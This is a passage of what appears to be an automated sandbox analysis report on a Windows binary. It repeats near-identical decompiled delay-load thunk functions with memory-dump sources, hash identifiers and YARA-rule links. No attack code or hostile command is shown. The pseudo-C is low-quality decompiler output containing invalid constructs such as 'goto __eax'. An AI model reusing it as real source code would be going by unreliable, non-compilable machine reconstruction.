                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: bca310526e7e925c042483f4fb9f45fbbed84e3b162177562c45d4d5cad56f83
                                                                                                                • Instruction ID: d1a34e985ed92927398cf01ffbb0b80fa580b366ef834df67e95d2856955a538
                                                                                                                • Opcode Fuzzy Hash: bca310526e7e925c042483f4fb9f45fbbed84e3b162177562c45d4d5cad56f83
                                                                                                                • Instruction Fuzzy Hash: 72A0118A2A8283BC302822222E02C3A030CC2E8F20330E82FF202A8280A8800E020032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2ACF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2ACF() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef694); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a08
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: e4f325ba7311edfd0d2cf5973297c26a0c3c4a0eb7f2197a1ecb5ef0c79e81cb
                                                                                                                • Instruction ID: d1a34e985ed92927398cf01ffbb0b80fa580b366ef834df67e95d2856955a538
                                                                                                                • Opcode Fuzzy Hash: e4f325ba7311edfd0d2cf5973297c26a0c3c4a0eb7f2197a1ecb5ef0c79e81cb
                                                                                                                • Instruction Fuzzy Hash: 72A0118A2A8283BC302822222E02C3A030CC2E8F20330E82FF202A8280A8800E020032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2AC5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2AC5() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef694); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a08
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: b931c8cbc3ffbd448261cc6d1ecea2cb5e5809cc2e5aa91f4d101ab57231e8d5
                                                                                                                • Instruction ID: d1a34e985ed92927398cf01ffbb0b80fa580b366ef834df67e95d2856955a538
                                                                                                                • Opcode Fuzzy Hash: b931c8cbc3ffbd448261cc6d1ecea2cb5e5809cc2e5aa91f4d101ab57231e8d5
                                                                                                                • Instruction Fuzzy Hash: 72A0118A2A8283BC302822222E02C3A030CC2E8F20330E82FF202A8280A8800E020032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2AD9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2AD9() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef694); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a08
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 56807fe57cbeed52f52d295e0b594b2400d3ee0218267a75569e2e553466aa86
                                                                                                                • Instruction ID: d1a34e985ed92927398cf01ffbb0b80fa580b366ef834df67e95d2856955a538
                                                                                                                • Opcode Fuzzy Hash: 56807fe57cbeed52f52d295e0b594b2400d3ee0218267a75569e2e553466aa86
                                                                                                                • Instruction Fuzzy Hash: 72A0118A2A8283BC302822222E02C3A030CC2E8F20330E82FF202A8280A8800E020032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2ABB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2ABB() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef694); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a08
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 833d573e1332aee932cebd9a8105da44876f94a73c16c6e63f9bd235b044d380
                                                                                                                • Instruction ID: d1a34e985ed92927398cf01ffbb0b80fa580b366ef834df67e95d2856955a538
                                                                                                                • Opcode Fuzzy Hash: 833d573e1332aee932cebd9a8105da44876f94a73c16c6e63f9bd235b044d380
                                                                                                                • Instruction Fuzzy Hash: 72A0118A2A8283BC302822222E02C3A030CC2E8F20330E82FF202A8280A8800E020032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A89, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2A89() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef694); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a08
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 3be415fbba3d664c27a993ae61f9e8b0978e837360be563bdc56ccba7577d417
                                                                                                                • Instruction ID: d1a34e985ed92927398cf01ffbb0b80fa580b366ef834df67e95d2856955a538
                                                                                                                • Opcode Fuzzy Hash: 3be415fbba3d664c27a993ae61f9e8b0978e837360be563bdc56ccba7577d417
                                                                                                                • Instruction Fuzzy Hash: 72A0118A2A8283BC302822222E02C3A030CC2E8F20330E82FF202A8280A8800E020032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2A43, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2A43() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef694); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a08
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: fba715c49900512d1feca73bdf4943bd8adb8a2d2e32797bebf738cbe6fe88ee
                                                                                                                • Instruction ID: d1a34e985ed92927398cf01ffbb0b80fa580b366ef834df67e95d2856955a538
                                                                                                                • Opcode Fuzzy Hash: fba715c49900512d1feca73bdf4943bd8adb8a2d2e32797bebf738cbe6fe88ee
                                                                                                                • Instruction Fuzzy Hash: 72A0118A2A8283BC302822222E02C3A030CC2E8F20330E82FF202A8280A8800E020032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2B01, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2B01() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef694); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2a08
                                                                                                                0x00ed2a0d
                                                                                                                0x00ed2a14

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2A0D
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: Ht>*
                                                                                                                • API String ID: 1269201914-4271059343
                                                                                                                • Opcode ID: 30a4553be3afe56f8a0ae4a2322df6563fcbe7eedfbdb1aae564f0b749cce02e
                                                                                                                • Instruction ID: d1a34e985ed92927398cf01ffbb0b80fa580b366ef834df67e95d2856955a538
                                                                                                                • Opcode Fuzzy Hash: 30a4553be3afe56f8a0ae4a2322df6563fcbe7eedfbdb1aae564f0b749cce02e
                                                                                                                • Instruction Fuzzy Hash: 72A0118A2A8283BC302822222E02C3A030CC2E8F20330E82FF202A8280A8800E020032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2C66, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2C66() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef6b4); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2c17
                                                                                                                0x00ed2c1c
                                                                                                                0x00ed2c23

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2C1C
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: cbwM,
                                                                                                                • API String ID: 1269201914-1933750459
                                                                                                                • Opcode ID: ca7b389c54016aebfbf37ec3a9e00477dd49597bbc079f6a280306fbd7da36f3
                                                                                                                • Instruction ID: 89c37ec8ca6aded4cc754144b78742830eb900e314f6d2efbbfe33c0eb9157aa
                                                                                                                • Opcode Fuzzy Hash: ca7b389c54016aebfbf37ec3a9e00477dd49597bbc079f6a280306fbd7da36f3
                                                                                                                • Instruction Fuzzy Hash: 1AA011822A8203BC302822222E03C3A020CC0E0F20330A82FF202A0280A8800E822032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2C5C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2C5C() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef6b4); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2c17
                                                                                                                0x00ed2c1c
                                                                                                                0x00ed2c23

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2C1C
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: cbwM,
                                                                                                                • API String ID: 1269201914-1933750459
                                                                                                                • Opcode ID: dd9911d0531c64fc0b2d9f6626f560a841c23d3b565fae005e99c443af611d07
                                                                                                                • Instruction ID: 89c37ec8ca6aded4cc754144b78742830eb900e314f6d2efbbfe33c0eb9157aa
                                                                                                                • Opcode Fuzzy Hash: dd9911d0531c64fc0b2d9f6626f560a841c23d3b565fae005e99c443af611d07
                                                                                                                • Instruction Fuzzy Hash: 1AA011822A8203BC302822222E03C3A020CC0E0F20330A82FF202A0280A8800E822032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2C52, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2C52() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef6b4); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2c17
                                                                                                                0x00ed2c1c
                                                                                                                0x00ed2c23

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2C1C
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: cbwM,
                                                                                                                • API String ID: 1269201914-1933750459
                                                                                                                • Opcode ID: 8e8a2cd720d94c8b4c879732990dbab52da1cc017dd6e1986d046c812c1f5cc8
                                                                                                                • Instruction ID: 89c37ec8ca6aded4cc754144b78742830eb900e314f6d2efbbfe33c0eb9157aa
                                                                                                                • Opcode Fuzzy Hash: 8e8a2cd720d94c8b4c879732990dbab52da1cc017dd6e1986d046c812c1f5cc8
                                                                                                                • Instruction Fuzzy Hash: 1AA011822A8203BC302822222E03C3A020CC0E0F20330A82FF202A0280A8800E822032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2C2A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2C2A() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef6b4); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2c17
                                                                                                                0x00ed2c1c
                                                                                                                0x00ed2c23

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2C1C
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                • String ID: cbwM,
                                                                                                                • API String ID: 1269201914-1933750459
                                                                                                                • Opcode ID: 4d0663e197210322b5020f15714f62dcddc729f67d5da31e3046ea39ad653488
                                                                                                                • Instruction ID: 89c37ec8ca6aded4cc754144b78742830eb900e314f6d2efbbfe33c0eb9157aa
                                                                                                                • Opcode Fuzzy Hash: 4d0663e197210322b5020f15714f62dcddc729f67d5da31e3046ea39ad653488
                                                                                                                • Instruction Fuzzy Hash: 1AA011822A8203BC302822222E03C3A020CC0E0F20330A82FF202A0280A8800E822032
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ED2C3E, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 22%
                                                                                                                			E00ED2C3E() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xeef6b4); // executed
				E00ED304E(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                                                                                                                0x00ed2c17
                                                                                                                0x00ed2c1c
                                                                                                                0x00ed2c23

                                                                                                                APIs
                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00ED2C1C
                                                                                                                  • Part of subcall function 00ED304E: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00ED30CB
                                                                                                                  • Part of subcall function 00ED304E: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00ED30DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
